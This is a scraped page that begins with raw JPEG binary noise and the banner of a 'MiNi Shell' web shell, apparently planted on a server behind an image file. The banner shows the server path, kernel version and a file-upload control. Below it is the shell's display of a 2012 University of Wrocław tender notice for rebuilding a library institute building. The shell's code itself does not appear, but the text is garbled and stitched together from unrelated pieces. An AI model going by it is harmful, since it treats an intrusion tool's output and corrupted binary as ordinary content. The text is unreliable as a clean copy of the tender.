JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120621/135463-N-2012.html

<p class="kh_header"><b>Wrocław: Wykonanie prac projektowych i robót budowlanych związanych z przebudową budynku Instytutu Informacji Naukowej i Bibliotekoznawstwa Uniwersytetu Wrocławskiego przy pl. Uniwersyteckim 9-13 we Wrocławiu.</b><br>
<b>Numer ogłoszenia: 135463 - 2012; data zamieszczenia: 21.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Wrocławski , pl. Uniwersytecki 1, 50-137 Wrocław, woj. dolnośląskie, tel. 071 3752234, faks 071 3752472.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bzp.uni.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie prac projektowych i robót budowlanych związanych z przebudową budynku Instytutu Informacji Naukowej i Bibliotekoznawstwa Uniwersytetu Wrocławskiego przy pl. Uniwersyteckim 9-13 we Wrocławiu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie prac projektowych i robót budowlanych związanych z przebudową budynku Instytutu Informacji Naukowej i Bibliotekoznawstwa Uniwersytetu Wrocławskiego przy pl. Uniwersyteckim 9-13 we Wrocławiu.
1.PARAMETRY OKREŚLAJĄCE WIELKOŚĆ OBIEKTU:

a)	Wysokość obiektu: 4-5  kondygnacji nadziemnych, jedna kondygnacja     podziemna ;
b)	Powierzchnia zabudowy : 465 m2;
c)	Powierzchnia użytkowa: 1291,42 m2
d)	Kubatura budynku:7604 m3;
e)	Długość budynku: ok. 30,5 m, szerokość do 19,85 m;

2. ZAKRES ZAMÓWIENIA: 
W zakres zamówienia wchodzi wykonanie, na podstawie Programu funkcjonalno-użytkowego, stanowiącego załączniki nr 8, 8a, 8b, 8c do SIWZ,  dokumentacji projektowej na wszystkich etapach realizacji inwestycji (projekty budowlane, wykonawcze, ewentualne projekty zamienne oraz warsztatowe), uzyskanie pozwolenia na budowę oraz wykonanie, na podstawie tej dokumentacji, robót budowlanych określonych w ww. Programie funkcjonalno-użytkowym. 
W procesie projektowym oraz w procesie realizacji inwestycji należy uzyskać wszelkie wymagane decyzje administracyjne, uzgodnienia oraz pozwolenia, aprobaty, licencje, atesty.
Główne założenia programowe to:
a)	dostosowanie budynków do obowiązujących przepisów technicznych, w tym zapewnienie dostępu dla osób niepełnosprawnych; 
b)	dostosowanie budynków do aktualnych przepisów ochrony przeciwpożarowej;
c)	modernizacja i rozbudowa instalacji elektrycznej

3.Prace projektowe -Część projektowa
Kompletna dokumentacja projektowa, (branże: architektura, konstrukcja, instalacja wodno-kanalizacyjna, instalacja wentylacyjna, instalacja centralnego ogrzewania, instalacja elektryczna i oświetleniowa, instalacja AV, projekt regałów jezdnych) wchodząca w zakres zamówienia, na podstawie której zostaną wykonane roboty budowlane objęte zamówieniem, powinna zawierać:
a)	projekt budowlany
b)	projekty wykonawcze
c)	przedmiary robót, 
d)	kosztorys robót budowlanych
e)	specyfikacje techniczne wykonania i odbioru robót
f)	 informację dotycząca bezpieczeństwa i ochrony zdrowia.

W ramach branży elektrycznej należy też wykonać projekt instalacji telewizji dozorowej, projekt systemu sygnalizacji włamania i napadu, projekt sieci okablowania strukturalnego.

4. Roboty budowlane - Część wykonawcza
     Roboty budowlane uwzględnione w programie funkcjonalno-użytkowym (PFU) obejmują prace związane z dostosowaniem obiektu do wymagań osób niepełnosprawnych, a także z przeniesieniem biblioteki na parter budynku, w miejsce po zlikwidowanym lokalu gastronomicznym oraz prace związane z dostosowaniem obiektu do innych przepisów budowlanych, w tym przepisów ochrony przeciwpożarowej. 
Uwaga !
     Obiekt będzie użytkowany nieprzerwanie w trakcie trwania robót budowlanych, tzn. roboty wykonywane będą w budynku czynnym i użytkowanym przez 7 dni w tygodniu (w godzinach 7:30 do 20:00.)
  Zakres robót:
a)	powiększenie otworów drzwiowych do wymaganych przepisami budowlanymi, wymiana drzwi , w tym zastosowanie drzwi przeciwpożarowych w określonych miejscach;
b)	przebudowa klatek schodowych, w tym przesunięcie biegów w klatce K2, dostawienie i likwidacja stopni lub biegów, likwidacja nosków w stopniach, wymiana barierek na barierki o wysokości 110 cm ) zamurowanie otworów w ścianie obudowy klatki schodowej K1;
c)	wprowadzenie windy osobowej w duszę klatki schodowej K2 ( winda na zamówienie specjalne) wraz z koniecznymi wyburzeniami ścian i obniżeniem poziomu posadzki w miejscu podszybia;
d)	wprowadzenie małego dźwigu serwisowego o napędzie hydraulicznym do przewozu książek z piwnicy na parter wraz z koniecznymi wyburzeniami ścian i stropu;
e)	wprowadzenie podnośnika dla niepełnosprawnych z poziomu ulicy na poziom parteru, usuniecie stopni schodów zewnętrznych i obniżenie poziomu posadzki w holu do poziomu chodnika przed wejściem do budynku;
f)	wprowadzenie instalacji hydrantowej DN25;
g)	przebicie otworów w ścianach piwnicznych w celu usprawnienia komunikacji;
h)	wymiana okien na granicy z obiektem przy ul. Kuźnicza 42 na okna o klasie odporności ogniowej EI 60, nieotwieralne;
i)	montaż systemu sygnalizacji pożaru (SSP) obejmującego cały obiekt w tym sterujący systemem oddymiania;
j)	wymiana wybranych okien na ostatniej kondygnacji na systemowe okna oddymiające z siłownikiem;
k)	wykonanie oświetlenia ewakuacyjnego o natężeniu minimalnym 5 lux w osi drogi ewakuacyjnej i czasie pracy awaryjnej min 2h. obejmującego strefy: klatki ewakuacyjne, wejścia do obiektu, korytarze (łączniki klatek ewakuacyjnych);
l)	wykucie otworów oddymiających w nadprożach ściany klatki schodowej K2 (bezpośrednio pod stropem);
m)	wyposażenie budynku w gaśnice w ilości min 2kg masy środka gaśniczego na 100 m2 - zapewniając do nich długość dojścia nie większą niż 30m;
n)	oznakowanie dróg ewakuacyjnych, urządzeń i sprzętu znakami przeciwpożarowymi;
o)	montaż wyłazu dachowego o klasie odporności ogniowej EI 30;
p)	zastąpienie stopni wyrównawczych na piętrach pochylniami;
q)	przebudowa toalety na 1. piętrze na toaletę dla osób niepełnosprawnych;
r)	przebudowa holu wejściowego;
s)	modernizacja instalacji elektrycznej;
t)	przebudowa pomieszczeń socjalnych na IV piętrze;
u)	przeniesienie pomieszczeń biblioteki na parter, wyposażenie pomieszczenia księgozbiorów i magazynu w regały jezdne;
v)	wydzielenie pomieszczenia serwerowni;
w)	malowanie ścian i sufitów;
x)	uzupełnienie posadzek i tynków w miejscach wyburzeń;
y)	wykonanie posadzek z konglomeratu kamiennego - lastrico (terazzo)- dotyczy schodów, holu i korytarzy łączących klatki schodowe.

4. Szczegółowy zakres prac opisuje Program funkcjonalno-użytkowy, opracowany przez dr inż. arch. Marka Skorupskiego, zawierający:
Załącznik nr 8 - Program funkcjonalno-użytkowy - część opisowa
Załącznik nr 8a - Koncepcja - część rysunkowa
Załącznik nr 8b - Inwentaryzacja
Załącznik nr 8c - Ekspertyz p. poż..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.32.00.00-7, 45.11.13.00-1, 45.26.25.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 322.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości 
25 000,00 zł (słownie: dwadzieścia pięć tysięcy zł).
2.	Wadium może być wnoszone w jednej lub kilku następujących formach: 
a.	pieniądzu,
b.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c.	gwarancjach bankowych,
d.	gwarancjach ubezpieczeniowych,
e.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 ze zm.).
3.	Gwarancja bankowa, gwarancja ubezpieczeniowa, poręczenie bankowe oraz poręczenia innych instytucji winny zostać złożone w formie dokumentu oryginalnego. Dokument wadialny powinien być wystawiony na Zamawiającego, mieć formę oświadczenia bezwarunkowego, nieodwołalnego i płatnego na pierwsze pisemne żądanie Zamawiającego.
4.	Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Uniwersytetu Wrocławskiego: 

Bank Zachodni WBK S.A. IV O/ Wrocław
NR KONTA 12 1090 2503 0000 0001 1257 6100
z dopiskiem: wadium na postępowanie nr BZP.2422.9.2012.KP

Wadium w formie pieniężnej winno znaleźć się na wskazanym rachunku Zamawiającego do upływu składania terminu ofert. Wadium wniesione w pieniądzu uznaje się za wniesione z chwilą jego wpłynięcia na wskazane konto Zamawiającego. Bankowy dowód wpłaty należy przedstawić w formie dołączonej do oferty kserokopii potwierdzonej przez Wykonawcę za zgodność z oryginałem.
5.	Pozostałe niepieniężne formy wadium, winny być złożone w oryginale w Kwesturze Uniwersytetu Wrocławskiego przy pl. Uniwersyteckim 1 we Wrocławiu (Dział Finansowy pok. Nr 108, I piętro, okienko nr 1) do upływu terminu składania ofert.   Kopię należy dołączyć do oferty.
6.	Wadium winno obejmować cały okres związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
wykonali zgodnie z zasadami sztuki budowlanej i prawidłowo ukończyli,  w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej:
a)	jedną robotę budowlaną, związaną z przebudową budynku, obejmującą budowę lub przebudowę windy osobowej, o łącznej wartości robót co najmniej 1 000 000,00 zł brutto.
lub
b)	 jedną robotę budowlaną, związaną z przebudową budynku o wartości robót co najmniej 1 000 000,00 zł brutto i co najmniej jedną robotę budowlaną związaną z przebudową lub budową windy osobowej.
W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w sekcji III.4.1) ogłoszenia..
     Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o     przedłożone dokumenty i oświadczenia wg formuły spełnia-nie spełnia. 
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy Pzp, określony warunek jest spełniony, gdy podmioty składające wspólną ofertę spełniają je łącznie.

 UWAGA! Do przeliczenia wartości występujących w innych walutach niż PLN Zamawiający jako kurs przeliczeniowy przyjmie średni kurs Narodowego Banku Polskiego (NBP), z dnia opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, przy czym średnie kursy walut dostępne są pod następującym adresem internetowym:
http://www.nbp.pl/home.aspx?f=/Kursy/kursy.html</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował następującymi osobami posiadającymi uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo Budowlane (Dz. U. z 2010 r. nr 243, poz. 1623 t.j.) i Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z dnia 16 maja 2006 r. nr 83 poz. 578) lub których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych:

a)	projektant posiadający uprawnienia bez ograniczeń do projektowania w specjalności architektonicznej;

b)	kierownik robót elektrycznych  posiadający uprawnienia do kierowania robotami budowlanymi w zakresie co najmniej instalacji i urządzeń elektrycznych;

c)	kierownik robót sanitarnych  posiadający uprawnienia do kierowania robotami budowlanymi w zakresie co najmniej instalacji i urządzeń sanitarnych;

d)	kierownik budowy posiadający uprawnienia bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej. 

W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w sekcji III.4.1) ogłoszenia.

Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o przedłożone dokumenty i oświadczenia wg formuły spełnia - nie spełnia.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy Pzp, określony warunek jest spełniony, gdy podmioty składające wspólną ofertę spełniają je łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz Ofertowy - załącznik nr 1 do SIWZ;
2)	Pełnomocnictwo dla osoby/osób podpisującej/cych ofertę do podejmowania zobowiązań w imieniu wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych (w formie oryginału lub kopii poświadczonej za zgodność przez notariusza) 
3)	W przypadku złożenia oferty wspólnej przez kilku Wykonawców, należy przedstawić pełnomocnictwo, w formie oryginału albo kopii poświadczonej za zgodność z oryginałem przez notariusza, ustanawiające pełnomocnika do reprezentowania Wykonawców w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna wskazywać rodzaj uprawnień, do których upoważniony jest Pełnomocnik, tj. np. podpisanie oferty, potwierdzenie za zgodność z oryginałem kopii dokumentów, składanie oświadczeń woli i wiedzy itp.
4)	Dowód wniesienia wadium;
5)	Jeżeli Wykonawca polegać będzie na wiedzy i doświadczeniu lub osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (w formie oryginału albo kopii poświadczonej za zgodność z oryginałem przez notariusza).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Jako odrębny załącznik nr 7 do SIWZ, Zamawiający zamieścił wzór umowy (wraz z kartą gwarancyjną), która określa warunki realizacji przedmiotowego zamówienia publicznego.
2.	Zmiany umowne dopuszczalne są tylko w sytuacjach wyraźnie wskazanych w § 15 wzoru umowy, tj.:
1) Ze względów losowych dopuszcza się zmianę przedstawicieli stron posiadających wskazane w Umowie kwalifikacje.
2) Dopuszcza się aneksy terminowe : 
a ) z powodu wystąpienia w trakcie realizacji robót budowlanych - nie zinwentaryzowanych instalacji skutkujących potrzebą rozwiązania zaistniałych kolizji lub przełożeniem instalacji.     
W ww. przypadku dopuszcza  się wydłużenie terminu zakończenia realizacji przedmiotu Umowy do: 35 dni                                                                                                                                                   
b ) z powodu wystąpienia w trakcie realizacji robót budowlanych - potrzeby wykonania badań konserwatorskich.                                                                                                                                 W ww. przypadku dopuszcza  się wydłużenie terminu zakończenia realizacji przedmiotu Umowy do: 42 dni                                                                                                                                                      c ) z  powodu wystąpienia okoliczności wymienionych w  §  2 ust. 2 Umowy.                                                         
W ww. przypadku dopuszcza  się wydłużenie terminu zakończenia realizacji przedmiotu Umowy  o okres wynikający wyłącznie z przekroczenia maksymalnego ustawowego terminu przez   Wydział Architektury i Budownictwa UM Wrocławia                                                                                             
d ) z powodu wstrzymania wykonywania robót budowlanych -  na wniosek Użytkownika obiektu. 
W ww. przypadku dopuszcza  się wydłużenie terminu zakończenia realizacji przedmiotu Umowy do: 28 dni.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bzp.uni.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Wrocławski, Biuro Zamówień Publicznych, ul. Kuźnicza 49-55, pok. nr 100, I.p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.07.2012 godzina 10:00, miejsce: Uniwersytet Wrocławski, Biuro Zamówień Publicznych, ul. Kuźnicza 49-55, pok. nr 100, I.p.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Termin wykonania całości zamówienia: do 322 dni od daty zawarcia umowy, 
w tym:
a)	termin wykonania i złożenia przez Wykonawcę do Wydziału Architektury UM Wrocławia kompletnego wniosku i projektu budowlanego- do 77 dni od daty zawarcia umowy;
b)	termin ukończenia i protokolarnego przekazania przez Wykonawcę Zamawiającemu Części projektowej (określonej w § 1 ust.1 umowy) - do 144 dni od daty zawarcia umowy;
c)	termin rozpoczęcia wykonywania robót budowlanych - do 161 dni od daty zawarcia umowy;
d)	termin ukończenia przez Wykonawcę Części wykonawczej (określonej w § 1 ust.2 umowy) - do 322 dni od daty zawarcia umowy.
2.	Zamawiający nie przewiduje zawarcia umowy ramowej, zastosowania dynamicznego systemu zakupów, wymagań, o których mowa w art. 29 ust.4.ustawy Pzp..</p>
